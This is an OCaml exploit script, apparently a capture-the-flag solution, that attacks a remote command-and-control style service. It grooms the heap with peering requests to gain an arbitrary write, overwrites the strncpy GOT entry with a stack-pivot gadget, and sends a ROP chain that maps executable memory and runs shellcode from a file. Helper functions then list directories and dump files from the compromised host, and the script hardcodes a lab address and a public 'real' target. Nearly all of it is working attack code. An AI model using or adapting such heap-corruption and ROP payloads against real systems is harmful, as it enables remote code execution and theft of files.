open StdLabels

let dump buf =
  let i = ref 0 in
  Bytes.iter (fun c -> Printf.printf "%02x" (Char.code c); incr i; if !i land 15 = 0 then print_string "\n") buf

let unhex txt =
  let n = String.length txt / 2 in
  let buf = Bytes.create n in
  for i = 0 to n - 1 do
    Scanf.sscanf (String.sub txt (i * 2) 2) "%02x" (fun c -> Bytes.set buf i (Char.chr c))
  done;
  buf

let ff = Format.std_formatter

let oss117 = 0x37313153534fL (* OSS117 *)

let cc_addr = 0L

let rec scomm_connect ip port =
  let fd = Unix.(socket PF_INET SOCK_STREAM 0) in
  Unix.(setsockopt fd TCP_NODELAY true);
  Unix.(connect fd (ADDR_INET (inet_addr_of_string ip, int_of_string port)));
  try
    Scomm.prepare_channel fd
  with Scomm.Enc_key_too_short ->
    Unix.close fd;
    Unix.sleep 1;
    scomm_connect ip port

type route =
  {         sc    : Scomm.chan
  ; mutable gw    : int64 option
  ; mutable peers : int64 list
  }

let add_route ip port =
  { sc    = scomm_connect ip port
  ; gw    = None
  ; peers = []
  }

let add_to_route r addr =
  Scomm.send r.sc (Msg.peering_request oss117 addr cc_addr);
  ignore (Scomm.recv ~timeout:0.05 r.sc);
  match r.gw with
  | None   -> r.gw <- Some addr
  | Some _ -> r.peers <- r.peers @ [ addr ]

let del_route r =
  Scomm.send r.sc Msg.bad_magic;
  r.peers <- []


let spray_routes ?(spray_id=0x33330000) ip port n p = (* n = # of routes, p = # of peers per route *)
  let routes = Array.init n (fun i ->
    let r = add_route ip port in
    let addr = Int64.of_int (spray_id + i * 256) in
    add_to_route r addr; (* first peering request is the gateway announcing its address *)
    r)
  in
  (* the following peering requests get recorded in the addresses table *)
  Array.iteri routes ~f:(fun i r ->
    for j = 1 to p do
      let addr = Int64.of_int (spray_id + i * 256 + j) in
      let addr =
        if i = 32 && j = 8 then 0x29L else addr (* pass previnuse(nextchunk) check in free() *)
      in
      add_to_route r addr
    done
  );
  routes

let phase0 ip port =
  Format.fprintf ff "[.] establishing test route\n%!";
  let r = add_route ip port in
  Format.fprintf ff "[.] peering gateway\n%!";
  let gw = Random.int64 (Int64.max_int) in
  Scomm.send r.sc (Msg.peering_request oss117 gw cc_addr);
  begin match Scomm.recv r.sc with
  | None ->
      Format.fprintf ff "[-] no peering answer\n%!"
  | Some buf ->
      Format.fprintf ff "[+] got back:\n%!";
      let hdr, msg = Msg.parse buf in
      Msg.print_hdr ff hdr;
      Msg.print ff msg
  end;
  let bot1 = Random.int64 (Int64.max_int) in
  let bot2 = Int64.succ bot1 in
  Format.fprintf ff "[.] peering bots\n%!";
  add_to_route r bot1;
  add_to_route r bot2;
  Format.fprintf ff "[.] pinging\n";
  Scomm.send r.sc (Msg.ping oss117 bot1 bot2 "hello");
  begin match Scomm.recv r.sc with
  | None ->
      Format.fprintf ff "[-] no pong\n%!"
  | Some buf ->
      Format.fprintf ff "[+] got back:\n%!";
      let hdr, msg = Msg.parse buf in
      Msg.print_hdr ff hdr;
      Msg.print ff msg
  end;
  Format.fprintf ff "[.] dropping route\n%!";
  del_route r

let phase1 ip port =
  let routes = spray_routes ip port 41 10 in
  let s = 10 in
  add_to_route routes.(s) 0x7777L;
  add_to_route routes.(s) 0x241L;
  Unix.sleep 1;
  del_route routes.(s+1);
  Unix.sleep 1;
  let _ = add_route ip port in
  routes

let phase2 ip port routes =
  let t = 20 in
  add_to_route routes.(t) 0x8888L;
  add_to_route routes.(t) 0x461L; (* corrupt chunk size of route t+1 *)
  Unix.sleep 1;
  del_route routes.(t+1); (* place chunk of size 0x460 in unsorted list *)
  Unix.sleep 1;
  let _ = add_route ip port in  (* re-add a route to compensate for the one we just deleted => problem here: the 0x460 block is split for the peer ! *)
  Unix.sleep 1;
  let _ = add_route ip port in  (* cause realloc of routing table over fake size chunk, overlapping address tables *)
  ()

let free_hook = 0x6D9D78

let got_plt_strncpy = 0x6D7080 

let phase3 ip port routes where what =
  let t = 20 in
  let w = where - 10 * 8 in (* w points to an address table already populated with 10 addresses *)
  add_to_route routes.(t+2) (Int64.of_int w);
  Unix.sleep 1;
  add_to_route routes.(7) what (* route 7's routing table entry overlaps route 22's address table *)

let write_prim ip port where what =
  let routes = phase1 ip port in
  Unix.sleep 1;
  phase2 ip port routes;
  Unix.sleep 1;
  phase3 ip port routes where what;
  routes

let add_rsp_18_ret = 0x411BF1L
let six_pops_ret = 0x40075DL

let ping_through_cc routes msg =
  let src = List.hd routes.(0).peers in
  let dst = List.hd routes.(1).peers in
  Scomm.send routes.(0).sc (Msg.ping oss117 src dst msg)


let chain = [

(* save rsi, which points to the config, for later use in the shellcode *)
      0x400766L; (* pop rdi; ret *)
      0x6D7100L; (* first qword in data section *)
      0x45161bL; (* mov [rdi], rsi; ret *)

(*
.text:0000000000455D0A 49 89 D9                                mov     r9, rbx         ; off                    <-- gadget 2
.text:0000000000455D0D 45 89 F8                                mov     r8d, r15d       ; fd
.text:0000000000455D10 45 89 F2                                mov     r10d, r14d      ; flags
.text:0000000000455D13 44 89 E2                                mov     edx, r12d       ; prot
.text:0000000000455D16 4C 89 EE                                mov     rsi, r13        ; len
.text:0000000000455D19 48 89 EF                                mov     rdi, rbp        ; addr
.text:0000000000455D1C B8 09 00 00 00                          mov     eax, 9
.text:0000000000455D21 0F 05                                   syscall                 ; LINUX - sys_mmap
.text:0000000000455D23 48 3D 00 F0 FF FF                       cmp     rax, 0FFFFFFFFFFFFF000h
.text:0000000000455D29 77 75                                   ja      short loc_455DA0
.text:0000000000455D2B
.text:0000000000455D2B                         loc_455D2B:                             ; CODE XREF: mmap64+A9↓j
.text:0000000000455D2B                                                                 ; mmap64+D3↓j
.text:0000000000455D2B 5B                                      pop     rbx                                      <-- gadget 1
.text:0000000000455D2C 5D                                      pop     rbp
.text:0000000000455D2D 41 5C                                   pop     r12
.text:0000000000455D2F 41 5D                                   pop     r13
.text:0000000000455D31 41 5E                                   pop     r14
.text:0000000000455D33 41 5F                                   pop     r15
.text:0000000000455D35 C3                                      retn
*)
      0x455D2BL;
             0L; (* offset *)
             0L; (* addr *)
             7L; (* PROT_READ | PROT_WRITE | PROT_EXEC *)
        0x4000L; (* len = 16k *)
          0x21L; (* flags = MAP_ANONYMOUS | MAP_SHARED *)
            -1L; (* fd *)

      0x455D0AL;
             0L;
             0L;
             0L;
             0L;
             0L;
             0L;

(* a series of gadgets effectively achieving "mov rdi, rax" *)
      0x408f59L; (* pop rcx; ret *)
      0x400766L; (* pop rdi; ret *)
      0x426903L; (* mov [rsp + 8], rax; call rcx -- saving rax below *)
      0x400766L; (* pop rdi; ret *)
             0L; (* placeholder for rax *)

(* ~ "lea rax, [rsp + 20h]" *)
      0x4017ffL; (* pop rbx; ret *)
      0x46dc16L; (* mov rax, r9; pop rbp; pop r12; pop r13; ret *)
      0x47eb2dL; (* lea r9, [rsp + 0x20]; call rbx *)
             0L;
             0L;

(* ~ "mov rsi, rax" *)
      0x4017ffL; (* pop rbx; ret *)
      0x4573f9L; (* pop rdx; pop rsi; ret *)
      0x45a018L; (* push rax; call rbx *)

      0x4573d5L; (* pop rdx; ret *)
        0x4000L;

      0x451510L; (* __memmove_sse2_unaligned -- copy 16k from stack to the RWX mmap'd block *)

      0x408f59L; (* pop rcx; ret *)
          0x80L;
      0x4117c3L  (* add rax, rcx; jmp rax *)
]

let nop_sled = Bytes.make 0x80 '\x90'

(* let shellcode = Bytes.of_string "\xeb\xfe" *)

let shellcode =
  let cin = open_in_bin "sc.bin" in
  let buf = Bytes.create 0x3800 in
  let n = input cin buf 0 (Bytes.length buf) in
  close_in cin;
  Bytes.sub buf 0 n

let pack_chain c =
  let n = List.length c in
  let buf = Bytes.create (8 * n) in
  List.iteri (fun i g -> Bytes.blit (Pack.pack "l" (ref g)) 0 buf (8 * i) 8) c;
  buf

let payload = Bytes.concat Bytes.empty [ pack_chain chain; nop_sled; shellcode ]

type dirent =
  { d_ino    : int64
  ; d_off    : int64
  ; d_reclen : int
  }

let read_dirents fd =
  let buf = Bytes.create 4096 in
  let n = Unix.read fd buf 0 4096 in
  let ofs = ref 0 in
  while !ofs < n do
    let ent = Pack.unpack "lls" ~pos:!ofs buf in
    let namelen = ent.d_reclen - 20 in
    Format.fprintf ff "dirent: ino=%Lx, off=%Lx, %s\n" ent.d_ino ent.d_off (Bytes.to_string (Bytes.sub buf (!ofs + 18) namelen));
    ofs := !ofs + ent.d_reclen
  done


let exploit ip port =
  let routes = write_prim ip port got_plt_strncpy six_pops_ret in
  Unix.sleep 1;
  ping_through_cc routes payload;
  let fd = routes.(0).sc.Scomm.fd in
  fd

let ls fd =
  let buf = Bytes.create 5 in
  let _ = Unix.read fd buf 0 5 in
  if buf <> "hello" then
    failwith "no hello"
  else
  let _ = Unix.read fd buf 0 4 in
  if buf <> "listo" then
    failwith "no list"
  else
    read_dirents fd

let readable ?(timeout = 1.) fd =
  let rdable, _, _ = Unix.select [ fd ] [] [] timeout in
  rdable = [ fd ]

let cat fd fname =
  let _ = Unix.write fd fname 0 (String.length fname) in
  let buf = Bytes.create 4 in
  let _ = Unix.read fd buf 0 4 in
  if buf <> "dump" then
    failwith "can't dump"
  else
  let tmp = Bytes.create 4096 in
  let buf = Buffer.create 4096 in
  while readable fd do
    let n = Unix.read fd tmp 0 4096 in
    Buffer.add_subbytes buf tmp 0 n
  done;
  Buffer.to_bytes buf

(* keep these last: *)
let ip = "192.168.56.101"
let port = "31337"

let real_ip = "195.154.105.12"
let real_port = "36735"

